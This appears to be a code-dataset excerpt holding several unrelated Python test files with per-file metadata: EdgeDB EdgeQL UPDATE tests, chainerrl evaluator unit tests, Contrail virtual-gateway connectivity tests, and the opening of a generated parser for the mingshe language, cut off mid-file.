await self.con.execute(
r"""
WITH MODULE test
UPDATE CollectionTest
FILTER .name = 'collection-test1'
SET {
some_tuple := ('coll_01', 1)
};
"""
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT CollectionTest {
name,
some_tuple,
} FILTER .name = 'collection-test1';
""",
[
{
'name': 'collection-test1',
'some_tuple': ['coll_01', 1],
},
]
)
async def test_edgeql_update_collection_02(self):
# test and UPDATE with a collection
await self.con.execute(
r"""
WITH MODULE test
UPDATE CollectionTest
FILTER .name = 'collection-test1'
SET {
str_array := ['coll_02', '2']
};
"""
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT CollectionTest {
name,
str_array,
} FILTER .name = 'collection-test1';
""",
[
{
'name': 'collection-test1',
'str_array': ['coll_02', '2'],
},
]
)
async def test_edgeql_update_in_conditional_bad_01(self):
"""UPDATE may not appear inside a conditional (??) expression."""
with self.assertRaisesRegex(
edgedb.QueryError,
'UPDATE statements cannot be used'):
await self.con.execute(r'''
WITH MODULE test
SELECT
(SELECT UpdateTest)
??
(UPDATE UpdateTest SET { name := 'no way' });
''')
async def test_edgeql_update_in_conditional_bad_02(self):
with self.assertRaisesRegex(
edgedb.QueryError,
'UPDATE statements cannot be used'):
await self.con.execute(r'''
WITH MODULE test
SELECT
(SELECT UpdateTest FILTER .name = 'foo')
IF EXISTS UpdateTest
ELSE (
(SELECT UpdateTest)
UNION
(UPDATE UpdateTest SET { name := 'no way' })
);
''')
async def test_edgeql_update_correlated_bad_01(self):
"""Referencing a set (Status) both as a tuple element and inside the
sibling UPDATE is an illegal correlated reference."""
with self.assertRaisesRegex(
edgedb.QueryError,
"cannot reference correlated set 'Status' here"):
await self.con.execute(r'''
WITH MODULE test
SELECT (
Status,
(UPDATE UpdateTest SET {
status := Status
})
);
''')
async def test_edgeql_update_correlated_bad_02(self):
with self.assertRaisesRegex(
edgedb.QueryError,
"cannot reference correlated set 'Status' here"):
await self.con.execute(r'''
WITH MODULE test
SELECT (
(UPDATE UpdateTest SET {
status := Status
}),
Status,
);
''')
async def test_edgeql_update_protect_readonly_01(self):
"""Updating a link declared read-only must be rejected, with the error
position pointing at the offending SET element."""
with self.assertRaisesRegex(
edgedb.QueryError,
"cannot update link 'readonly_tag': "
"it is declared as read-only",
_position=180,
):
await self.con.execute(r'''
WITH MODULE test
UPDATE UpdateTest
FILTER .name = 'update-test-readonly'
SET {
readonly_tag := (SELECT Tag FILTER .name = 'not read-only')
};
''')
async def test_edgeql_update_protect_readonly_02(self):
with self.assertRaisesRegex(
edgedb.QueryError,
"cannot update property 'readonly_note': "
"it is declared as read-only",
_position=181,
):
await self.con.execute(r'''
WITH MODULE test
UPDATE UpdateTest
FILTER .name = 'update-test-readonly'
SET {
readonly_note := 'not read-only',
};
''')
async def test_edgeql_update_protect_readonly_03(self):
with self.assertRaisesRegex(
edgedb.QueryError,
"cannot update property 'readonly_note': "
"it is declared as read-only",
_position=223,
):
await self.con.execute(r'''
WITH MODULE test
UPDATE UpdateTest
FILTER .name = 'update-test-readonly'
SET {
weighted_tags: {
@readonly_note := 'not read-only',
},
};
''')
    async def test_edgeql_update_append_01(self):
        """Append (+=) on a multi link adds targets without dropping existing ones."""
        await self.con.execute("""
            WITH MODULE test
            INSERT UpdateTest {
                name := 'update-test-append-1',
            };
            WITH MODULE test
            INSERT UpdateTest {
                name := 'update-test-append-2',
            };
            WITH MODULE test
            INSERT UpdateTest {
                name := 'update-test-append-3',
            };
        """)

        # Seed the link with a single target using plain assignment.
        await self.con.execute("""
            WITH
                MODULE test,
                U2 := UpdateTest
            UPDATE UpdateTest
            FILTER .name = 'update-test-append-1'
            SET {
                annotated_tests := (
                    SELECT U2 FILTER .name = 'update-test-append-2'
                )
            };
        """)

        await self.assert_query_result(
            r"""
                WITH MODULE test
                SELECT UpdateTest {
                    name,
                    annotated_tests: {
                        name,
                        @note
                    } ORDER BY .name
                } FILTER UpdateTest.name = 'update-test-append-1';
            """,
            [
                {
                    'name': 'update-test-append-1',
                    'annotated_tests': [{
                        'name': 'update-test-append-2',
                        '@note': None,
                    }],
                },
            ]
        )

        # Append a second target (with a link property) via `+=`.
        await self.con.execute("""
            WITH
                MODULE test,
                U2 := UpdateTest
            UPDATE UpdateTest
            FILTER .name = 'update-test-append-1'
            SET {
                annotated_tests += (
                    SELECT U2 { @note := 'foo' }
                    FILTER .name = 'update-test-append-3'
                )
            };
        """)

        # Both the original and the appended target must be present.
        await self.assert_query_result(
            r"""
                WITH MODULE test
                SELECT UpdateTest {
                    name,
                    annotated_tests: {
                        name,
                        @note
                    } ORDER BY .name
                } FILTER UpdateTest.name = 'update-test-append-1';
            """,
            [
                {
                    'name': 'update-test-append-1',
                    'annotated_tests': [{
                        'name': 'update-test-append-2',
                        '@note': None,
                    }, {
                        'name': 'update-test-append-3',
                        '@note': 'foo',
                    }],
                },
            ]
        )
    async def test_edgeql_update_append_02(self):
        """Append (+=) on a 'single' computable link must be rejected."""
        with self.assertRaisesRegex(
            edgedb.QueryError,
            "possibly more than one element returned by an expression"
            " for a computable link 'annotated_status' declared as 'single'",
            _position=147,
        ):
            await self.con.execute("""
                WITH MODULE test
                UPDATE UpdateTest
                FILTER .name = 'foo'
                SET {
                    annotated_status += (
                        SELECT Status FILTER .name = 'status'
                    )
                };
            """)
    async def test_edgeql_append_badness_01(self):
        """`+=` is a syntax error inside an INSERT shape."""
        with self.assertRaisesRegex(
            edgedb.QueryError,
            r"unexpected '\+='",
            _position=123,
        ):
            await self.con.execute("""
                WITH MODULE test
                INSERT UpdateTest
                {
                    annotated_status += (
                        SELECT Status FILTER .name = 'status'
                    )
                };
            """)
    async def test_edgeql_append_badness_02(self):
        """`+=` is a syntax error inside a SELECT shape."""
        with self.assertRaisesRegex(
            edgedb.QueryError,
            r"unexpected '\+='",
            _position=123,
        ):
            await self.con.execute("""
                WITH MODULE test
                SELECT UpdateTest
                {
                    annotated_status += (
                        SELECT Status FILTER .name = 'status'
                    )
                };
            """)
    async def test_edgeql_update_subtract_01(self):
        """Subtract (-=) on a multi link removes only the matching targets."""
        await self.con.execute("""
            WITH MODULE test
            INSERT UpdateTest {
                name := 'update-test-subtract-1',
            };
            WITH MODULE test
            INSERT UpdateTest {
                name := 'update-test-subtract-2',
            };
            WITH MODULE test
            INSERT UpdateTest {
                name := 'update-test-subtract-3',
            };
        """)

        # Give subtract-1 two link targets with distinct link properties.
        await self.con.execute("""
            WITH
                MODULE test,
                U2 := UpdateTest
            UPDATE UpdateTest
            FILTER .name = 'update-test-subtract-1'
            SET {
                annotated_tests := (
                    FOR v IN {
                        ('update-test-subtract-2', 'one'),
                        ('update-test-subtract-3', 'two'),
                    }
                    UNION (
                        SELECT U2 {
                            @note := v.1,
                        } FILTER .name = v.0
                    )
                )
            };
        """)

        # Give subtract-3 a single link target to ensure it is untouched
        # by the later subtraction on subtract-1.
        await self.con.execute("""
            WITH
                MODULE test,
                U2 := UpdateTest
            UPDATE UpdateTest
            FILTER .name = 'update-test-subtract-3'
            SET {
                annotated_tests := (
                    FOR v IN {
                        ('update-test-subtract-2', 'one'),
                    }
                    UNION (
                        SELECT U2 {
                            @note := v.1,
                        } FILTER .name = v.0
                    )
                )
            };
        """)

        # Baseline state before the subtraction.
        await self.assert_query_result(
            r"""
                WITH MODULE test
                SELECT UpdateTest {
                    name,
                    annotated_tests: {
                        name,
                        @note
                    } ORDER BY .name
                } FILTER
                    .name LIKE 'update-test-subtract-%';
            """,
            [
                {
                    'name': 'update-test-subtract-1',
                    'annotated_tests': [{
                        'name': 'update-test-subtract-2',
                        '@note': 'one',
                    }, {
                        'name': 'update-test-subtract-3',
                        '@note': 'two',
                    }],
                },
                {
                    'name': 'update-test-subtract-2',
                    'annotated_tests': [],
                },
                {
                    'name': 'update-test-subtract-3',
                    'annotated_tests': [{
                        'name': 'update-test-subtract-2',
                        '@note': 'one',
                    }],
                },
            ]
        )

        # Remove one target from subtract-1 via `-=`.
        await self.con.execute("""
            WITH
                MODULE test,
                U2 := UpdateTest
            UPDATE UpdateTest
            FILTER .name = 'update-test-subtract-1'
            SET {
                annotated_tests -= (
                    SELECT U2
                    FILTER .name = 'update-test-subtract-2'
                )
            };
        """)

        # Only subtract-1's link set changed; subtract-3 kept its target.
        await self.assert_query_result(
            r"""
                WITH MODULE test
                SELECT UpdateTest {
                    name,
                    annotated_tests: {
                        name,
                        @note
                    } ORDER BY .name
                } FILTER
                    .name LIKE 'update-test-subtract-%';
            """,
            [
                {
                    'name': 'update-test-subtract-1',
                    'annotated_tests': [{
                        'name': 'update-test-subtract-3',
                        '@note': 'two',
                    }],
                },
                {
                    'name': 'update-test-subtract-2',
                    'annotated_tests': [],
                },
                {
                    'name': 'update-test-subtract-3',
                    'annotated_tests': [{
                        'name': 'update-test-subtract-2',
                        '@note': 'one',
                    }],
                },
            ]
        )
    async def test_edgeql_update_subtract_02(self):
        """Subtract (-=) clears single links, single props and multi props."""
        await self.con.execute("""
            WITH MODULE test
            INSERT UpdateTest {
                name := 'update-test-subtract-various',
                annotated_status := (
                    SELECT Status {
                        @note := 'forever',
                    } FILTER .name = 'Closed'
                ),
                comment := 'to remove',
                str_tags := {'1', '2', '3'},
            };
        """)

        # Baseline state before any subtraction.
        await self.assert_query_result(
            r"""
                WITH MODULE test
                SELECT UpdateTest {
                    annotated_status: {
                        name,
                        @note
                    },
                    comment,
                    str_tags ORDER BY UpdateTest.str_tags
                } FILTER
                    .name = 'update-test-subtract-various';
            """,
            [
                {
                    'annotated_status': {
                        'name': 'Closed',
                        '@note': 'forever',
                    },
                    'comment': 'to remove',
                    'str_tags': ['1', '2', '3'],
                },
            ],
        )

        # Check that singleton links work.
        await self.con.execute("""
            WITH
                MODULE test
            UPDATE UpdateTest
            FILTER .name = 'update-test-subtract-various'
            SET {
                annotated_status -= (SELECT Status FILTER .name = 'Closed')
            };
        """)

        await self.assert_query_result(
            r"""
                WITH MODULE test
                SELECT UpdateTest {
                    annotated_status: {
                        name,
                        @note
                    },
                } FILTER
                    .name = 'update-test-subtract-various';
            """,
            [
                {
                    'annotated_status': None,
                },
            ],
        )

        # And singleton properties too.
        await self.con.execute("""
            WITH
                MODULE test
            UPDATE UpdateTest
            FILTER .name = 'update-test-subtract-various'
            SET {
                comment -= 'to remove'
            };
        """)

        await self.assert_query_result(
            r"""
                WITH MODULE test
                SELECT UpdateTest {
                    comment,
                } FILTER
                    .name = 'update-test-subtract-various';
            """,
            [
                {
                    'comment': None,
                },
            ],
        )

        # And multi properties as well.
        await self.con.execute("""
            WITH
                MODULE test
            UPDATE UpdateTest
            FILTER .name = 'update-test-subtract-various'
            SET {
                str_tags -= '2'
            };
        """)

        await self.assert_query_result(
            r"""
                WITH MODULE test
                SELECT UpdateTest {
                    str_tags,
                } FILTER
                    .name = 'update-test-subtract-various';
            """,
            [
                {
                    'str_tags': {'1', '3'},
                },
            ],
        )
    async def test_edgeql_subtract_badness_01(self):
        """`-=` is a syntax error inside an INSERT shape."""
        with self.assertRaisesRegex(
            edgedb.QueryError,
            r"unexpected '-='",
            _position=123,
        ):
            await self.con.execute("""
                WITH MODULE test
                INSERT UpdateTest
                {
                    annotated_status -= (
                        SELECT Status FILTER .name = 'status'
                    )
                };
            """)
    async def test_edgeql_update_inheritance_01(self):
        """UPDATE on a supertype also reaches objects of its subtypes."""
        await self.con.execute('''
            WITH MODULE test
            INSERT UpdateTest {
                name := 'update-test-inh-supertype-1',
                related := (
                    SELECT (DETACHED UpdateTest)
                    FILTER .name = 'update-test1'
                )
            };
            WITH MODULE test
            INSERT UpdateTestSubType {
                name := 'update-test-inh-subtype-1',
                related := (
                    SELECT (DETACHED UpdateTest)
                    FILTER .name = 'update-test1'
                )
            };
        ''')

        # The UPDATE filters by name only, so it must find the subtype
        # object through the supertype and return exactly one result.
        await self.assert_query_result(
            r"""
                WITH MODULE test
                UPDATE UpdateTest
                FILTER .name = 'update-test-inh-subtype-1'
                SET {
                    comment := 'updated',
                    related := (
                        SELECT (DETACHED UpdateTest)
                        FILTER .name = 'update-test2'
                    ),
                };
            """,
            [{}],
        )

        # Only the subtype object changed; the supertype object is intact.
        await self.assert_query_result(
            r"""
                WITH MODULE test
                SELECT UpdateTest {
                    name,
                    comment,
                    related: {
                        name
                    }
                }
                FILTER .name LIKE 'update-test-inh-%'
                ORDER BY .name
            """,
            [
                {
                    'name': 'update-test-inh-subtype-1',
                    'comment': 'updated',
                    'related': [{
                        'name': 'update-test2'
                    }]
                },
                {
                    'name': 'update-test-inh-supertype-1',
                    'comment': None,
                    'related': [{
                        'name': 'update-test1'
                    }]
                },
            ]
        )
| 29.817582
| 79
| 0.34347
| 4,965
| 72,248
| 4.893656
| 0.068278
| 0.083549
| 0.076059
| 0.054328
| 0.87126
| 0.849817
| 0.802486
| 0.766556
| 0.740338
| 0.707783
| 0
| 0.018994
| 0.562036
| 72,248
| 2,422
| 80
| 29.829893
| 0.748878
| 0.014519
| 0
| 0.613083
| 0
| 0
| 0.349528
| 0.023293
| 0
| 0
| 0
| 0
| 0.071677
| 1
| 0.000696
| false
| 0
| 0.003479
| 0
| 0.006263
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8a493e90856ac13e2ee239bb98ebfc708f93762c
| 5,041
|
py
|
Python
|
tests/experiments_tests/test_evaluator.py
|
yuishihara/chainerrl
|
74901712a8ed8207b9d526d3f45b04bf22996b8d
|
[
"MIT"
] | 18
|
2018-08-07T07:27:41.000Z
|
2018-08-20T01:51:21.000Z
|
tests/experiments_tests/test_evaluator.py
|
yuishihara/chainerrl
|
74901712a8ed8207b9d526d3f45b04bf22996b8d
|
[
"MIT"
] | null | null | null |
tests/experiments_tests/test_evaluator.py
|
yuishihara/chainerrl
|
74901712a8ed8207b9d526d3f45b04bf22996b8d
|
[
"MIT"
] | 2
|
2018-08-16T06:47:26.000Z
|
2018-08-20T01:51:22.000Z
|
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from builtins import * # NOQA
from future import standard_library
standard_library.install_aliases() # NOQA
import tempfile
import unittest
from chainer import testing
import mock
import chainerrl
@testing.parameterize(
    *testing.product({
        'save_best_so_far_agent': [True, False],
        'n_runs': [1, 2],
    })
)
class TestEvaluator(unittest.TestCase):
    """Tests for chainerrl.experiments.evaluator.Evaluator.

    Parameterized over whether the best-so-far agent is saved and the
    number of evaluation runs per evaluation.
    """

    def test_evaluate_if_necessary(self):
        """Evaluation triggers only on eval_interval boundaries; the agent
        is saved only on a new best score (and only when enabled)."""
        outdir = tempfile.mkdtemp()

        agent = mock.Mock()
        agent.act.return_value = 'action'
        agent.get_statistics.return_value = []

        env = mock.Mock()
        # Every episode terminates immediately with reward 0.
        env.reset.return_value = 'obs'
        env.step.return_value = ('obs', 0, True, {})

        evaluator = chainerrl.experiments.evaluator.Evaluator(
            agent=agent,
            env=env,
            n_runs=self.n_runs,
            eval_interval=3,
            outdir=outdir,
            max_episode_len=None,
            explorer=None,
            step_offset=0,
            save_best_so_far_agent=self.save_best_so_far_agent,
        )

        # Before reaching eval_interval no evaluation should run.
        evaluator.evaluate_if_necessary(t=1, episodes=1)
        self.assertEqual(agent.act.call_count, 0)

        evaluator.evaluate_if_necessary(t=2, episodes=2)
        self.assertEqual(agent.act.call_count, 0)

        # First evaluation
        evaluator.evaluate_if_necessary(t=3, episodes=3)
        self.assertEqual(agent.act.call_count, self.n_runs)
        self.assertEqual(agent.stop_episode.call_count, self.n_runs)
        if self.save_best_so_far_agent:
            self.assertEqual(agent.save.call_count, 1)
        else:
            self.assertEqual(agent.save.call_count, 0)

        # Second evaluation with the same score
        evaluator.evaluate_if_necessary(t=6, episodes=6)
        self.assertEqual(agent.act.call_count, 2 * self.n_runs)
        self.assertEqual(agent.stop_episode.call_count, 2 * self.n_runs)
        if self.save_best_so_far_agent:
            # Same score is not a new best, so no additional save.
            self.assertEqual(agent.save.call_count, 1)
        else:
            self.assertEqual(agent.save.call_count, 0)

        # Third evaluation with a better score
        env.step.return_value = ('obs', 1, True, {})
        evaluator.evaluate_if_necessary(t=9, episodes=9)
        self.assertEqual(agent.act.call_count, 3 * self.n_runs)
        self.assertEqual(agent.stop_episode.call_count, 3 * self.n_runs)
        if self.save_best_so_far_agent:
            self.assertEqual(agent.save.call_count, 2)
        else:
            self.assertEqual(agent.save.call_count, 0)
@testing.parameterize(
    *testing.product({
        'save_best_so_far_agent': [True, False],
        'n_runs': [1, 2],
    })
)
class TestAsyncEvaluator(unittest.TestCase):
    """Tests for chainerrl.experiments.evaluator.AsyncEvaluator.

    Same scenario as TestEvaluator, except that env and agent are passed
    per evaluate_if_necessary() call instead of at construction time.
    """

    def test_evaluate_if_necessary(self):
        """Evaluation triggers only on eval_interval boundaries; the agent
        is saved only on a new best score (and only when enabled)."""
        outdir = tempfile.mkdtemp()

        agent = mock.Mock()
        agent.act.return_value = 'action'
        agent.get_statistics.return_value = []

        env = mock.Mock()
        # Every episode terminates immediately with reward 0.
        env.reset.return_value = 'obs'
        env.step.return_value = ('obs', 0, True, {})

        evaluator = chainerrl.experiments.evaluator.AsyncEvaluator(
            n_runs=self.n_runs,
            eval_interval=3,
            outdir=outdir,
            max_episode_len=None,
            explorer=None,
            step_offset=0,
            save_best_so_far_agent=self.save_best_so_far_agent,
        )

        # Before reaching eval_interval no evaluation should run.
        evaluator.evaluate_if_necessary(t=1, episodes=1, env=env, agent=agent)
        self.assertEqual(agent.act.call_count, 0)

        evaluator.evaluate_if_necessary(t=2, episodes=2, env=env, agent=agent)
        self.assertEqual(agent.act.call_count, 0)

        # First evaluation
        evaluator.evaluate_if_necessary(t=3, episodes=3, env=env, agent=agent)
        self.assertEqual(agent.act.call_count, self.n_runs)
        self.assertEqual(agent.stop_episode.call_count, self.n_runs)
        if self.save_best_so_far_agent:
            self.assertEqual(agent.save.call_count, 1)
        else:
            self.assertEqual(agent.save.call_count, 0)

        # Second evaluation with the same score
        evaluator.evaluate_if_necessary(t=6, episodes=6, env=env, agent=agent)
        self.assertEqual(agent.act.call_count, 2 * self.n_runs)
        self.assertEqual(agent.stop_episode.call_count, 2 * self.n_runs)
        if self.save_best_so_far_agent:
            # Same score is not a new best, so no additional save.
            self.assertEqual(agent.save.call_count, 1)
        else:
            self.assertEqual(agent.save.call_count, 0)

        # Third evaluation with a better score
        env.step.return_value = ('obs', 1, True, {})
        evaluator.evaluate_if_necessary(t=9, episodes=9, env=env, agent=agent)
        self.assertEqual(agent.act.call_count, 3 * self.n_runs)
        self.assertEqual(agent.stop_episode.call_count, 3 * self.n_runs)
        if self.save_best_so_far_agent:
            self.assertEqual(agent.save.call_count, 2)
        else:
            self.assertEqual(agent.save.call_count, 0)
| 34.527397
| 78
| 0.653243
| 655
| 5,041
| 4.770992
| 0.134351
| 0.1344
| 0.1792
| 0.04992
| 0.88896
| 0.88896
| 0.88896
| 0.88896
| 0.88896
| 0.88896
| 0
| 0.014725
| 0.245586
| 5,041
| 145
| 79
| 34.765517
| 0.806994
| 0.038286
| 0
| 0.719298
| 0
| 0
| 0.017772
| 0.009093
| 0
| 0
| 0
| 0
| 0.245614
| 1
| 0.017544
| false
| 0
| 0.096491
| 0
| 0.131579
| 0.008772
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0a01df8e1da7a33697cbaaeb438ef70a04d76a7d
| 10,983
|
py
|
Python
|
serial_scripts/vgw/verify.py
|
vkolli/5.0_contrail-test
|
1793f169a94100400a1b2fafbad21daf5aa4d48a
|
[
"Apache-2.0"
] | null | null | null |
serial_scripts/vgw/verify.py
|
vkolli/5.0_contrail-test
|
1793f169a94100400a1b2fafbad21daf5aa4d48a
|
[
"Apache-2.0"
] | 1
|
2021-06-01T22:18:29.000Z
|
2021-06-01T22:18:29.000Z
|
serial_scripts/vgw/verify.py
|
lmadhusudhanan/contrail-test
|
bd39ff19da06a20bd79af8c25e3cde07375577cf
|
[
"Apache-2.0"
] | null | null | null |
from time import sleep
import os
from vn_test import *
from vm_test import *
from floating_ip import *
from tcutils.util import get_random_name
class VerifyVgwCases():

    """Virtual Gateway (VGW) verification scenarios.

    Each public method drives one scenario end-to-end: create fixtures,
    launch a VM, and verify external connectivity through the VGW by
    pinging www-int.juniper.net.  The fixture/bookkeeping steps that were
    duplicated verbatim across all four scenarios are factored into the
    private helpers below; public method names and signatures are
    unchanged.
    """

    def _make_private_vn(self, subnets):
        """Create, register and return a private VN fixture with a random name."""
        return self.useFixture(
            VNFixture(
                project_name=self.inputs.project_name,
                connections=self.connections,
                inputs=self.inputs,
                vn_name=get_random_name('VN-Private'),
                subnets=subnets))

    def _select_computes(self, compute_type):
        """Pick (vm_compute, vgw_compute) node names for a scenario.

        With more than one compute node, the VGW node is looked up from
        the testbed VGW config; the VM is placed on the same node when
        compute_type == 'same', otherwise on a different one.  With a
        single compute node both roles fall on that node.
        """
        host_list = self.connections.nova_h.get_hosts()
        vgw_compute = None
        vm_compute = None
        if len(host_list) > 1:
            for key in self.vgw_vn_list:
                if key.split(":")[3] == self.vn_fixture_dict[0].vn_name:
                    vgw_compute = self.vgw_vn_list[
                        key]['host'].split("@")[1]
            if compute_type == 'same':
                vm_compute = self.inputs.host_data[vgw_compute]['name']
            else:
                host_list.remove(self.inputs.host_data[vgw_compute]['name'])
                vm_compute = self.inputs.host_data[host_list[0]]['name']
        else:
            vm_compute = self.inputs.host_data[host_list[0]]['name']
            vgw_compute = host_list[0]
        return vm_compute, vgw_compute

    def _launch_vm(self, vn_fixture, vm_name, node_name):
        """Boot a VM on *vn_fixture* at *node_name*, verify it, return its fixture."""
        vm_fixture = self.useFixture(
            VMFixture(
                project_name=self.inputs.project_name,
                connections=self.connections,
                vn_obj=vn_fixture.obj,
                vm_name=vm_name,
                node_name=node_name))
        assert vm_fixture.verify_on_setup()
        return vm_fixture

    def _attach_fip(self, fip_vn_fixture, vm_fixture):
        """Create a FIP pool on *fip_vn_fixture*, associate a FIP with
        *vm_fixture*, verify each step and schedule disassociation cleanup."""
        fip_pool_name = get_random_name('some-pool1')
        fip_fixture = self.useFixture(
            FloatingIPFixture(
                project_name=self.inputs.project_name,
                inputs=self.inputs,
                connections=self.connections,
                pool_name=fip_pool_name,
                vn_id=fip_vn_fixture.vn_id))
        assert fip_fixture.verify_on_setup()
        fip_id = fip_fixture.create_and_assoc_fip(
            fip_vn_fixture.vn_id, vm_fixture.vm_id)
        assert fip_fixture.verify_fip(fip_id, vm_fixture, fip_vn_fixture)
        self.addCleanup(fip_fixture.disassoc_and_delete_fip, fip_id)

    def _check_external_ping(self, vm_fixture, failure_msg):
        """Ping www-int.juniper.net from *vm_fixture*.

        Log *failure_msg* and return False on failure, True otherwise.
        """
        self.logger.info("Now trying to ping www-int.juniper.net")
        if not vm_fixture.ping_with_certainty('www-int.juniper.net'):
            self.logger.error(failure_msg)
            return False
        return True

    def verify_vgw_with_fip(self, compute_type):
        """A VM on a private VN reaches outside through a floating IP + VGW."""
        vn_fixture_private = self._make_private_vn(['10.10.10.0/24'])
        # Verification of VN
        assert vn_fixture_private.verify_on_setup()
        assert self.vn_fixture_dict[0].verify_on_setup()
        # Selection of compute to launch VM and VGW to configure
        vm_compute, vgw_compute = self._select_computes(compute_type)
        vm1_name = get_random_name('VGW_VM1-FIP-' + vm_compute)
        vm1_fixture = self._launch_vm(vn_fixture_private, vm1_name, vm_compute)
        self._attach_fip(self.vn_fixture_dict[0], vm1_fixture)
        assert self._check_external_ping(
            vm1_fixture,
            'Test ping outside VN cluster from VM %s failed' % (vm1_name))
        return True
    # End verify_vgw_with_fip

    def verify_vgw_with_native_vm(self, compute_type):
        """A VM launched directly on the VGW VN reaches outside."""
        # Verification of VN
        assert self.vn_fixture_dict[0].verify_on_setup()
        vm_compute, vgw_compute = self._select_computes(compute_type)
        vm1_name = get_random_name('VGW_VM1-Native-' + vm_compute)
        vm1_fixture = self._launch_vm(
            self.vn_fixture_dict[0], vm1_name, vm_compute)
        assert self._check_external_ping(
            vm1_fixture,
            'Test ping outside VN cluster from VM %s failed' % (vm1_name))
        return True
    # End verify_vgw_with_native_vm

    def verify_vgw_with_multiple_subnet(self):
        """A VGW configured with multiple subnets still provides external
        connectivity via FIP."""
        vn_fixture_private = self._make_private_vn(['30.10.10.0/24'])
        # Scan the testbed config for a VGW VN configured with multiple
        # subnets and pick the matching VN fixture.
        for key in self.vgw_vn_list:
            if len(self.vgw_vn_list[key]['subnet']) > 1:
                for key1 in self.vn_fixture_dict:
                    if key.split(":")[3] == self.vn_fixture_dict[0].vn_name:
                        vn_fixture = key1
                        break
                break
        vm1_name = get_random_name('VGW_VM2')
        # Verification of VN
        assert vn_fixture_private.verify_on_setup()
        assert vn_fixture.verify_on_setup()
        # NOTE(review): the original did not pin the VM to a node here,
        # leaving placement to the scheduler; preserved as-is.
        vm1_fixture = self.useFixture(
            VMFixture(
                project_name=self.inputs.project_name,
                connections=self.connections,
                vn_obj=vn_fixture_private.obj,
                vm_name=vm1_name))
        assert vm1_fixture.verify_on_setup()
        self._attach_fip(vn_fixture, vm1_fixture)
        assert self._check_external_ping(
            vm1_fixture,
            'Test ping outside VN cluster from VM %s failed' % (vm1_name))
        return True
    # End verify_vgw_with_multiple_subnet

    def vgw_restart_of_vgw_node(self):
        """External connectivity survives a vrouter-agent restart on the
        VGW node."""
        vn_fixture_private = self._make_private_vn(['40.10.10.0/24'])
        # Verification of VN
        assert vn_fixture_private.verify_on_setup()
        assert self.vn_fixture_dict[0].verify_on_setup()
        # Always place the VM on a different compute than the VGW so the
        # restart exercises only the gateway path.
        vm_compute, vgw_compute = self._select_computes('different')
        vm1_name = get_random_name('VGW_VM1-FIP-' + vm_compute)
        vm1_fixture = self._launch_vm(vn_fixture_private, vm1_name, vm_compute)
        self._attach_fip(self.vn_fixture_dict[0], vm1_fixture)
        assert self._check_external_ping(
            vm1_fixture,
            'Test ping outside VN cluster from VM %s failed' % (vm1_name))
        # Restart vrouter service
        self.logger.info('Will restart compute services now')
        self.inputs.restart_service('contrail-vrouter-agent', [vgw_compute],
                                    container='agent')
        sleep(30)
        # Try ping after vrouter restart
        assert self._check_external_ping(
            vm1_fixture,
            'Test ping outside VN cluster from VM %s after vrouter restart failed' %
            (vm1_name))
        return True
| 36.979798
| 97
| 0.597287
| 1,375
| 10,983
| 4.493091
| 0.094545
| 0.048559
| 0.031564
| 0.041275
| 0.893007
| 0.872613
| 0.864519
| 0.858854
| 0.855131
| 0.855131
| 0
| 0.013846
| 0.316125
| 10,983
| 296
| 98
| 37.10473
| 0.808681
| 0.085951
| 0
| 0.857143
| 0
| 0
| 0.082409
| 0.002198
| 0
| 0
| 0
| 0
| 0.101382
| 1
| 0.018433
| false
| 0
| 0.02765
| 0
| 0.069124
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0a46c2c2aa75060778200d5c316fd814a2746c5b
| 339,267
|
py
|
Python
|
mingshe/parser.py
|
abersheeran/mingshe
|
a68901a41f152764d2e81b61770c30d5be2aadc2
|
[
"Apache-2.0"
] | 45
|
2021-05-17T06:16:00.000Z
|
2022-03-22T08:10:03.000Z
|
mingshe/parser.py
|
abersheeran/mingshe
|
a68901a41f152764d2e81b61770c30d5be2aadc2
|
[
"Apache-2.0"
] | 16
|
2021-05-17T01:33:27.000Z
|
2021-12-31T15:04:30.000Z
|
mingshe/parser.py
|
abersheeran/mingshe
|
a68901a41f152764d2e81b61770c30d5be2aadc2
|
[
"Apache-2.0"
] | 2
|
2021-09-02T04:54:44.000Z
|
2021-09-22T09:21:53.000Z
|
#!/usr/bin/env python3.8
# @generated by pegen from ../../mingshe.gram
import ast
import sys
import tokenize
from typing import Any, Optional
from pegen.parser import memoize, memoize_left_rec, logger, Parser
import copy
import io
import itertools
import os
import sys
import token
from typing import (
Any, Callable, Iterator, List, Literal, Tuple, TypeVar, Union, NoReturn
)
from pegen.tokenizer import Tokenizer
# Singleton ast nodes, created once for efficiency
Load = ast.Load()
Store = ast.Store()
Del = ast.Del()

# Generic type variables used by the helper-method signatures below.
Node = TypeVar("Node")
FC = TypeVar("FC", ast.FunctionDef, ast.AsyncFunctionDef, ast.ClassDef)

# Maps an ast expression class to the human-readable name used in
# error messages (see Parser.get_expr_name).
EXPR_NAME_MAPPING = {
    ast.Attribute: "attribute",
    ast.Subscript: "subscript",
    ast.Starred: "starred",
    ast.Name: "name",
    ast.List: "list",
    ast.Tuple: "tuple",
    ast.Lambda: "lambda",
    ast.Call: "function call",
    ast.BoolOp: "expression",
    ast.BinOp: "expression",
    ast.UnaryOp: "expression",
    ast.GeneratorExp: "generator expression",
    ast.Yield: "yield expression",
    ast.YieldFrom: "yield expression",
    ast.Await: "await expression",
    ast.ListComp: "list comprehension",
    ast.SetComp: "set comprehension",
    ast.DictComp: "dict comprehension",
    ast.Dict: "dict literal",
    ast.Set: "set display",
    ast.JoinedStr: "f-string expression",
